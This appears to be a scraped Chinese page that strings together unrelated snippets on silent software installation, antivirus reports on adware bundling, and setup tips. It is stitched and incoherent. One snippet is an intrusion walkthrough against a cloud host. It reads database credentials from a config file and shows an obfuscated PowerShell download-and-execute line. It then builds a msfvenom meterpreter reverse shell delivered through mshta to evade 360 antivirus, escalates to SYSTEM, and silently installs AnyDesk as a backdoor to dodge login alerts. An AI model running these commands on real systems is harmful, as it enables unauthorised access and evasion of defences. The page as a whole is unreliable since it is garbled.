近期有较多网友反馈电脑被无故安装360安全卫士极速版。经火绒工程师溯源发现,目前360安全卫士极速版正通过购买搜索引擎排名、弹窗提示等“诱导式”手段推广并静默安装。根据火绒威胁情报系统监测显示,从年初至今,已有超千万用户受到360系软件上述推广行为的影响,且于近期呈大幅上升趋势。 值得关注的是,360安全卫士极速版的整套推广流程,存在较为明显的对抗痕迹,即对火绒安全等多款安全软件进行检测规避,甚至利用系统程序隐匿推广行为(注入explorer进程)。
在我们日常的运维工作中,批量部署软件恐怕是经常遇到的情景,今天分享的是windows域软件分发方式的介绍。
近期,火绒收到用户反馈,在pc6下载站中下载安卓应用程序的电脑版软件时,实际安装的是一款名为“云即玩”的模拟器,并且该模拟器会捆绑流氓软件“天空压缩”。经过火绒安全人员分析,发现该流氓软件可以执行后台静默安装、创建推广快捷方式、弹出指定网页等各种恶意行为,对用户构成较大的威胁。目前,火绒安全产品可对上述病毒进行拦截查杀,请用户及时更新病毒库以进行防御。
1. 软件如果已经安装,到注册表中查询其安装/卸载参数,看 InstallSource(如果有)和 UninstallString 的参数内容信息。
翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。 ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。 0x04 绕过主动防御上线 测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。 powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。 1、生成载荷并编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin cat /tmp/shellcode.bin | base64 -w 0 2、配置监听模块参数 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 155.**.***.16 set lport 443 exploit 3、目标主机执行载荷 mshta http://155.**.***.16:8888/bypass360.hta 注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。 0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。 为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。 注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。 @echo off AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password choice /t 10 /d y /n >nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。 至此,全文结束,内网就不搞了!!!
“白名单“,即一系列被信任的对象的集合,与”黑名单“对应,通常被用来实现”排除“类的逻辑。在安全领域中,”白名单“通常被用来优化对信任对象的分析逻辑或解决查杀、拦截逻辑所产生的误报等。
今天搞了一个装机软件,可以导入第三方软件,在导入的时候提示输入静默参数,于是我就了解了一些,什么是静默参数。
JRE 1.8 与 IntelliJ IDEA 发行版捆绑在一起。您不需要在你的电脑上安装 Java 就可以运行 IntelliJ IDEA。
PhpStorm 是一个跨平台 IDE,可在 Windows、macOS 和 Linux 操作系统上提供一致的体验。
近期,火绒安全实验室拦截到一批携带病毒的“小马激活工具”。病毒启动后会从远程服务器上下载恶意配置信息,并执行静默安装软件的恶意行为。推广的软件包括“360”、“2345”系列软件以及“腾讯电脑管家”等其他软件,不排除后续下发其他恶意配置的可能。火绒安全软件可查杀该病毒;【软件安装拦截】功能可拦截被推广的软件。
一、概况 近日,腾讯反病毒实验室拦截到一个恶意推广木马大范围传播,总传播量上百万,经分析和排查发现该木马具有以下特征: 1)该木马是通过网页挂马的方式传播的,经分析黑客用来挂马的漏洞是前段时间Hacking Team事件爆出的flash漏洞CVE-2015-5122。新版本的Flash Player已经修复了该漏洞,但是国内仍有大量的电脑未进行更新,给该木马的传播创造了条件。 2)经分析和追踪,发现挂马的主体是一个广告flash,大量存在于博彩类网站、色情类网站、外挂私服类网站、中小型下载站等,以及部分流氓
【快讯】近日,火绒收到多位网友反馈,称在未安装“火绒安全软件”的情况下被静默安装了金山毒霸软件,甚至卸载后再次被安装,不堪其扰。鉴于此前已有不少用户反馈此类情况,火绒工程师高度重视,对金山毒霸的推广渠道进行重点跟踪分析,发现其除了通过第三方软件(驱动精灵、QQ音乐等)、下载站下载器推广外,更是存在利用多个病毒进行推广的恶行。
有个汇总vc库的开源项目在不定期更新,https://github.com/abbodi1406/vcredist/tree/master/source_links
好吧~windos!~这个百年不愿意碰的东西,看桌面小弟兄有点辛苦,今天抽空写了个批处理。让安装不再麻烦!~
http://www.microsoft.com/en-us/download/details.aspx?id=8109
摘自 http://downloadmirror.intel.com/18725/eng/readme.htm#chs
这个软件是最好的选择。 虽然我曾经想过使用metasploit,boxstarter等方式分发,最后发现,这个最简单。
最近有一个需求,是配置新电脑的环境,步骤很简单,停止windows update 服务和禁止windows update服务,把登陆的ctrl+alt+delete的方式去除,最后要安装radmin。
在制作安装包的时候,可以在 Inno Setup 安装包脚本的 Run 里面添加在解压缩安装包文件完成之后,整个安装结束之前执行指定的命令,是作为定制化最高的内容
Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。
例如,如果您正在为 64 位系统下载 JDK 安装程序,用于更新 17 Interim 0、Update 0 和 Patch 0,则文件名 jdk-17.interim.update.patch_windows-x64_bin.exe变成 jdk-17_windows-x64_bin.exe.
本文章或工具仅供安全研究使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,极致攻防实验室及文章作者不为此承担任何责任。
目录 Python2、Python3共存的方法 python2下载及环境变量配置 第一步、打开Python官网,下载Python2 第二步、python2环境变量配置 测试结果 Python2、Python3共存的方法 方法如下: 先确保不同版本解释器的python.exe所在的路径在环境变量中 拷贝各自的python.exe并重命名即可 步骤(理解不了下面有图示): 1、首先你需要将不同的python版本安装,且都已经将跟版本的环境变量配置好了(环境变量的配置前面的文章有)python3和2
上一篇文章主要记录 了Python简介,相信你已经爱上了小P,俗话说的好:公欲善其事,必先利其器,所以本文将带领你安装Python3!
1. 全自动安装: a) 在每个.ww里面有一个名为Config.XML的配置文件来实现的。专业增强版本位于光盘根目录下的ProPlus.ww目录下,企业版则位于Enterprise.WW目录下 b) 用记事本打开目录下的Config.xml,我们只需要修改里面的相应行就可以实现免输序列号、自动输入用户名、单位、定制安装组件。 < PIDKEY Value = “有效的安装序列号” / > <USERNAME Value=”用户名” /> <COMPANYNAME Value=”公司名” /> 以上内容禁用中文符号 <OptionState Id=“OptionID”State=”absent” Children=“force”/> 我们只要将不需要安装的项目替换其中的“OptionID”即可。如果需要不安装多个项目,则可以分多行来指定,absent就是不安装的意思 <OptionState Id=“OptionID”State=”Local” Children=“force”/> 我们只要将需要安装的项目替换其中的“OptionID”即可。如果需要安装多个项目,也是分多行来指定,”Local”就是本地安装的意思 下面就是相关的设置例子: <INSTALLLOCATION Value=”%programfiles%\Microsoft Office” /> ;默认安装路径 <OptionState Id=”WORDFiles” State=”Local” Children=”force” /> ;默认安装Word组件 <OptionState Id=”EXCELFiles” State=”Local” Children=”force” /> ;默认安装Excel组件 <OptionState Id=”PPTFiles” State=”Local” Children=”force” /> ;默认安装PowerPoint <OptionState Id=”ACCESSFiles” State=”Local” Children=”force” /> ;默认安装Access
近期,火绒安全实验室根据用户反馈,发现一款名为“拉法日历”的病毒正在通过21压缩软件进行大肆传播,目前感染量达数万台。该病毒被植入终端后,会通过下载执行恶意驱动模块的方式,向用户实施捆绑安装、广告弹窗等恶意行为,严重威胁用户的信息安全。值得注意的是,该病毒仍在持续更新中,不排除后续下发新的恶意模块,添加新的恶意功能。目前,火绒安全软件已对该病毒进行拦截查杀。
官网下载地址:https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe
包括HttpUtils、DownloadManagerPro、ShellUtils、PackageUtils、PreferencesUtils、JSONUtils、FileUtils、ResourceUtils、StringUtils、ParcelUtils、RandomUtils、ArrayUtils、ImageUtils、ListUtils、MapUtils、ObjectUtils、SerializeUtils、SystemUtils、TimeUtils。
【下载离线版FireFox】 https://www.firefox.com.cn/ 📷 📷 📷 【下载离线版Chrome】 https://www.google.cn/chrome/thank-yo
在2月18日发布的上一篇文章中,讲解了利用WDS结合MDT的方式,批量化地自动部署Windows 11的过程,当时发现一个小小的bug,就是配置文件中预先输入的用户名和密码无效,客户端从网卡启动后,必须输入用户名和账号才能开始安装。
.exe .dll .jpg .jpeg .png .avi .mp3 .mp4.....
之前我也分享过一篇"ToDesk软件在权限提升中的应用",记录的是在权限提升场景下的利用方式。
在 【Android 插件化】VAHunt 引入 | VAHunt 原理 | VAHunt 识别插件化引擎 和 【Android 插件化】VAHunt 检测插件化引擎的具体细节 博客中 , 简单介绍了如何检测插件化引擎 ;
1.下载Office2016安装包(MicrosoftOffice2016_XiTongZhiJia.zip)和激活程序包(Office2016jhgj_V10.2.0_XiTongZhiJia.zip),先解压Office安装包,鼠标双击“setup.exe”安装程序,接下来就等待安装完毕。
近期,火绒安全团队发现“即刻PDF阅读器”内置后门程序,该后门程序会在用户不知情的情况下,从C&C服务器上下载恶意配置文件,再根据配置文件下载恶意模块到用户电脑中。目前发现该病毒会肆意收集用户个人隐私信息,如:QQ号、淘宝昵称、电商购物记录、电商和搜索引擎搜索记录等隐私数据。
在上期重装系统的教程中,很多同学想知道如何封装系统,恰好我也会,今天为大家带来最简单的系统封装教程。
ParamSpider是一款功能强大的Web参数挖掘工具,广大研究人员可以利用ParamSpider来从Web文档的最深处挖掘出目标参数。
“输入法”或许是计算机软件领域最伟大的发明之一了,也是我们日常的计算机使用中最常用到的软件,一款好的输入法能让我们事半功倍。随着计算机的软硬件不断发展,输入法的功能也不再局限于协助用户完成“输入”的工作,各家输入法为了拉拢用户,绞尽脑汁的为输入法添加了各种各样的小功能,往往能让人眼前一亮。 但试想,如果输入法的附加功能是弹广告呢?近日,360安全中心接到用户的反馈,说自己的浏览器首页被改了,还莫名其妙的弹出好多广告来。经过我们的一番排查,最终捕获到了这样的一款弹广告的输入法…… 来自色站的你 正所谓“英雄难
之前有很多朋友都问过我,在Android系统中怎样才能实现静默安装呢?所谓的静默安装,就是不用弹出系统的安装界面,在不影响用户任何操作的情况下不知不觉地将程序装好。虽说这种方式看上去不打搅用户,但是却存在着一个问题,因为Android系统会在安装界面当中把程序所声明的权限展示给用户看,用户来评估一下这些权限然后决定是否要安装该程序,但如果使用了静默安装的方式,也就没有地方让用户看权限了,相当于用户被动接受了这些权限。在Android官方看来,这显示是一种非常危险的行为,因此静默安装这一行为系统是不会开放给开
近日,有研究人员发现其计算机主板BIOS中预置了一款由Absolute公司开发的防盗追踪软件Computrace,在计算机启动后,操作系统会静默安装该软件并向境外传输不明数据。该软件还可从计算机中远程获取用户文件,监控用户行为以及在未授权情况下下载安装不明程序。
总是忍受不了 Window 系统的任务栏,一直都很碍眼,不透明,看着就难受,后来找到了 TranslucentTB 这个软件,非常好用。
Python3下载地址:https://www.python.org/downloads/windows/
本文告诉大家如何通过命令行的方法,在安装程序静默调用 VC++ 库的安装,解决缺少环境问题
添加变量值内容D:\python3\Scripts\;D:\python3\;D:\python2\Scripts\;D:\python2\ (python2与python3的安装路径)
Oracle的官方安装包,除了软件外,还会自带一个示例数据库,准确地说,是几个示例schema,像HR用户,很多教程中用到的测试数据,其实就来自这。
之前boss提出一个需求,运行在广告机上的app,需要完成自动升级的功能,广告机是非触摸屏的,不能通过手动点击,所以app必须做到自动下载,自动安装升级,并且安装完成后,app还要继续运行,最好不借助其它app来实现以上功能。
Appium is an open source test automation framework for use with native, hybrid and mobile web apps. It drives iOS, Android, and Windows apps using the WebDriver protocol. Appium是一个开源测试自动化框架,可用于原生,混合和移动Web应用程序测试。它使用WebDriver协议驱动iOS,Android和Windows应用程序。
插件化应用中 , 宿主应用 加载 插件 APK , 需要获取该插件 APK 文件路径 , 可以在 Assets 资源目录 , 也可以在 Android 内置存储 或 SD 卡存储控件中 ;
领取专属 10元无门槛券
手把手带您无忧上云